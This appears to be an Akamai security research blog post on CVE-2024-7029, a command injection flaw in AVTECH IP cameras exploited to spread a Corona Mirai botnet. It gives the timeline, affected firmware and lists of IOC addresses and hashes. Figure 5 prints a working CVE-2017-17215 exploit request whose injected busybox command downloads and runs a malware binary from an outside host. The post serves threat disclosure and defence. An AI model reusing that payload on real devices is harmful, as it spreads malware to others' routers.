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Beware the Unpatchable: Corona Mirai Botnet Spreads via Zero-Day

Akamai Wave Blue

Written by

Kyle Lefton, Larry Cashdollar, and Aline Eliovich

August 28, 2024

Kyle Lefton

Written by

Kyle Lefton

Kyle Lefton is a security researcher on Akamai's Security Intelligence Response Team. Formerly an intelligence analyst for the Department of Defense, Kyle has experience in cyber defense, threat research, and counter-intelligence, spanning several years. He takes pride in investigating emerging threats, vulnerability research, and threat group mapping. In his free time, he enjoys spending time with friends and family, strategy games, and hiking in the great outdoors.

Larry Cashdollar

Written by

Larry Cashdollar

Larry Cashdollar has been working in the security field as a vulnerability researcher for more than 20 years and is currently a Principal Security Researcher on the Security Intelligence Response Team at Akamai. He studied computer science at the University of Southern Maine. Larry has documented more than 300 CVEs and has presented his research at BotConf, BSidesBoston, OWASP Rhode Island, and DEF CON. He enjoys the outdoors and rebuilding small engines in his spare time.

Aline Eliovich

Written by

Aline Eliovich

Aline Eliovich, with six years of experience in the security field, currently works as a Researcher on Akamai's Security Intelligence Response Team. She studied computer science at the Holon Technology Institute. Aline enjoys using different Open Source Intelligence (OSINT) methods for her research.

The exploit of this vulnerability allows an attacker to execute remote code on a target system.
The exploit of this vulnerability allows an attacker to execute remote code on a target system.

Editorial and additional commentary by Tricia Howard
Copyedited by Maria Vlasak

Executive summary

  • The Akamai Security Intelligence and Response Team (SIRT) has observed a botnet campaign that is abusing several previously exploited vulnerabilities, as well as a zero-day vulnerability discovered by the SIRT.

  • CVE-2024-7029 (discovered by Aline Eliovich) is a command injection vulnerability found in the brightness function of AVTECH closed-circuit television (CCTV) cameras that allows for remote code execution (RCE).

  • Once injected, the botnet spreads a Mirai variant with string names that reference the COVID-19 virus that has been seen since at least 2020.  

  • We have included a list of indicators of compromise (IOCs) to assist in defense against this threat.

Jump to proof of concept

Introduction

The Akamai SIRT monitors and participates in a number of internal and external intelligence feeds to keep both our own and our customers’ online lives safe. We have discovered several active threats through our global honeypot network, including the one we are discussing today: CVE-2024-7029, discovered by Aline Eliovich.

This RCE zero-day vulnerability was discovered in the brightness function of AVTECH IP camera devices and allows for a command injection to spread a Mirai variant on a target system. This can be executed remotely with elevated privileges (running process owner.) In August 2024, CISA issued an industrial control system (ICS) advisory for this vulnerability citing lack of attack complexity, remote exploitation, and known public exploitation.

The botnet campaign targets multiple vulnerabilities outside of CVE-2024-7029, including several AVTECH vulnerabilities, a Hadoop YARN RCE, CVE-2014-8361, and CVE-2017-17215. This follows the troubling attacker trend of using older, likely low-priority, vulnerabilities that remain unpatched to fulfill a malicious purpose.

Catch up and patch up

If ever there was a time to catch up on your patching, it would be now — many of these vulnerabilities have an RCE element to them. Worse than that, the lack of formal CVE assignment makes it difficult to track the bug, let alone patch it.

In this blog post, we will describe the zero-day attack and its impact, and present a comprehensive list of IOCs for detection or mitigation ease.

What is CVE-2024-7029?

In short, CVE-2024-7029 is a vulnerability in AVTECH IP camera devices in which the “brightness” argument in the “action=” parameter allows for command injection. The threat actor we observed took advantage of this vulnerability to spread a Mirai variant with string names referencing the COVID-19 virus.

How long has it been active?

The first active campaign we observed began on March 18, 2024, but analysis showed activity for this variant as early as December 2023. The proof of concept (PoC) for CVE-2024-7029 has been publicly available since at least 2019, but it never had a proper CVE assignment until August 2024.

Who is affected?

This vulnerability in AVTECH IP camera devices affects up to and including AVM1203 firmware versions FullImg-1023-1007-1011-1009. Despite the model in question having been discontinued for several years, CISA stated in their advisory that these devices are still used worldwide, including by transportation authorities and other critical infrastructure entities.

How does it work?

This vulnerability was originally discovered by examining our honeypot logs. Figure 1 shows the decoded URL for clarity.

Decoded payload Fig. 1: Decoded payload body of the exploit attempts

The vulnerability lies in the brightness function within the file /cgi-bin/supervisor/Factory.cgi (Figure 2).

The vulnerability lies in the brightness function Fig. 2: PoC of the exploit

What could happen?

In the exploit examples we observed, essentially what happened is this: The exploit of this vulnerability allows an attacker to execute remote code on a target system.

Figure 3 is an example of a threat actor exploiting this flaw to download and run a JavaScript file to fetch and load their main malware payload. Similar to many other botnets, this one is also spreading a variant of Mirai malware to its targets.

Figure 3 is an example of a threat actor exploiting this flaw to download and run a JavaScript file to fetch and load their main malware payload. Fig. 3: Strings from the JavaScript downloader

In this instance, the botnet is likely using the Corona Mirai variant, which has been referenced by other vendors as early as 2020 in relation to the COVID-19 virus. 

Upon execution, the malware connects to a large number of hosts through Telnet on ports 23, 2323, and 37215. It also prints the string “Corona” to the console on an infected host (Figure 4).

It also prints the string “Corona” to the console on an infected host (Figure 4).
It also prints the string “Corona” to the console on an infected host (Figure 4). Fig. 4: Execution of malware showing output to console

Static analysis of the strings in the malware samples shows targeting of the path /ctrlt/DeviceUpgrade_1 in an attempt to exploit Huawei devices affected by CVE-2017-17215. The samples have two hard-coded command and control IP addresses, one of which is part of the CVE-2017-17215 exploit code (Figure 5). 

  POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
  Content-Length: 430
  Connection: keep-alive
  Accept: */*
  Authorization: Digest username=\"dslf-config\", realm=\"HuaweiHomeGateway\", nonce=\"88645cefb1f9ede0e336e3569d75ee30\", uri=\"/ctrlt/DeviceUpgrade_1\", response=\"3612f843a42db38f48f59d2a3597e19c\", algorithm=\"MD5\", qop=\"auth\", nc=00000001, cnonce=\"248d1a2560100669\"

  <?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:Upgrade xmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\"><NewStatusURL>$(/bin/busybox wget -g 45.14.244[.]89 -l /tmp/mips -r /mips; /bin/busybox chmod 777 * /tmp/mips; /tmp/mips huawei.rep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>

Fig. 5: CVE-2017-17215 /ctrlt/DeviceUpgrade_1 exploit code

The botnet also targeted several other vulnerabilities including a Hadoop YARN RCE, CVE-2014-8361, and CVE-2017-17215.We have observed these vulnerabilities exploited in the wild several times, and they continue to be successful.

Conclusion

A vulnerability without a formal CVE assignment may still pose a threat to your organization — in fact, it could be a significant threat. Malicious actors who operate these botnets have been using new or under-the-radar vulnerabilities to proliferate malware. CVE-2024-7029 is another example of using the latter, which is becoming an increasingly popular attack trend observed by the SIRT.

There are many vulnerabilities with public exploits or available PoCs that lack formal CVE assignment, and, in some cases, the devices remain unpatched. Managing patch priorities is arduous, especially when the threats have no available patch. If there is no way to remediate a threat, decommissioning the hardware and software is the recommended way to mitigate security risks and lower the risk of regulatory fines.

Keep up with us

The Akamai SIRT will continue to discover, monitor, and report on threats such as CVE-2024-7029 for the safety of our customers, fellow employees, and the security community at large. To keep up with current findings, you can follow us on social media or check out our security research page.

IOCS

IPv4 addresses

93.123.39[.]72

93.123.39[.]87

93.123.39[.]111

147.78.103[.]177

185.216.70[.]37

94.156.8[.]185

93.123.39[.]173

74.50.81[.]158

94.156.71[.]74

93.123.85[.]213

185.216.70[.]142

45.66.231[.]148

185.216.70[.]79

SHA256 hashes

15a1d52c529d314bb2b5fa8b8bd6c6a496609a283dd0e78e595c929e720d1b5b (“r”)

c0ae1eb249705f61d45ca747c91c02a411557a28792f4064c1d647abb580bc10 (“x86”)

b0f7ef937d77061515907c54967a44da3701e0d2af143164bbf44bb4fc6f26af  (“sh”)

e82192fbe00bc7205abe786155bbfc0548f5c6ee9819a581e965526674f3cc57  (“mips”)

9e9e481bb448438572c2695469c85f773ddcd952025e45bee33bbfce2531c656  (“r”)

f4bf61fc335db4f3e7d7d89b534bc1e6ead66a51938e119ea340fe95039935e3  (“mips”)

22553be649f76a060ebbdfd410e295b66803e9c49d23369a726be2c5a25733ab  (“sh”

135264de24d499877e95673b9cca737e488042813f41fef7817728a704323fe2  (“r”)

6ad5984bc9af7af6962a080bbb1a35bb56e8671c4b9c1d44e88da5a3f6b9aa82  (“r”)

947f517d3b833cc046b2ea0540aad199b7777fb03057122fb0b618828abdc212  (“r”)

8ac82a770cffbbc8fba73554d7caa117ef6d37ffee468665b95bc406449f91b5 (“r”)

5e264cb009c4d84b6180e47b9ceda3af8897b17b88fccc9c2914706d66abd1d1  (“r”)

372eefdc4bf9f4a4382db2762fcf9a9db559c9d4fff2ee5f5cf5362418caaa92  (“r”)

3995a7e7eb8eeafb0b6da2c3813e61d11993a820d478c87809136de79d8f8280  (“sh”)

40d8f662c187b53fd6fdeb70db9eb262b707e557d3fa4e5e4eacaeaa03ac45f2  (“r”)

4826b0194fbd924aa57b9c4ab1e017f0f45f547189374b0ea761d415fa4285ff  (“x86”)

25945c4fe38ed2008f027bd1484b89867b23528c738812d317ddf57f48666b91  (“r”)

cfcae524309a220a48327c50bf32bf5ed3aed5698855b5da9f1ae932fb2df90c  (“x86”)

774947944ea370592a30478bb3f26081799f7d7df975a6735e620d3442e7803b  (“x86”)

06b1f09a62204472581e6aec381f96014bb6cc3fc1a9cef38bbcfe88bd82e499  (“r”)

4f50d318688c80f08eb7fad6f8788cae459c3420b3b9eb566f936edd7a780ae1  (“sh”)

c15bbfb85bfd8305fad8cc0e0d06cbe825e1e6fc6d8dbe5a8d1ac4243bd77d0c  (“x86”)

0a566c39ecbc4107f954cb3e5e240ccaf0018dfac9b5062b4db7971fb3d9f413 (“x86”)

2d7351aa765bb2feed9536cc392b2013361c193e99841c5b56591d988bd4b582  (“x86”)

5d58f0fa54784e9c90825cba9e2052f691cdcfe85b0796a6379982832563090d (“x86”)
See more research
See more research
Akamai Wave Blue

Written by

Kyle Lefton, Larry Cashdollar, and Aline Eliovich

August 28, 2024

Kyle Lefton

Written by

Kyle Lefton

Kyle Lefton is a security researcher on Akamai's Security Intelligence Response Team. Formerly an intelligence analyst for the Department of Defense, Kyle has experience in cyber defense, threat research, and counter-intelligence, spanning several years. He takes pride in investigating emerging threats, vulnerability research, and threat group mapping. In his free time, he enjoys spending time with friends and family, strategy games, and hiking in the great outdoors.

Larry Cashdollar

Written by

Larry Cashdollar

Larry Cashdollar has been working in the security field as a vulnerability researcher for more than 20 years and is currently a Principal Security Researcher on the Security Intelligence Response Team at Akamai. He studied computer science at the University of Southern Maine. Larry has documented more than 300 CVEs and has presented his research at BotConf, BSidesBoston, OWASP Rhode Island, and DEF CON. He enjoys the outdoors and rebuilding small engines in his spare time.

Aline Eliovich

Written by

Aline Eliovich

Aline Eliovich, with six years of experience in the security field, currently works as a Researcher on Akamai's Security Intelligence Response Team. She studied computer science at the Holon Technology Institute. Aline enjoys using different Open Source Intelligence (OSINT) methods for her research.

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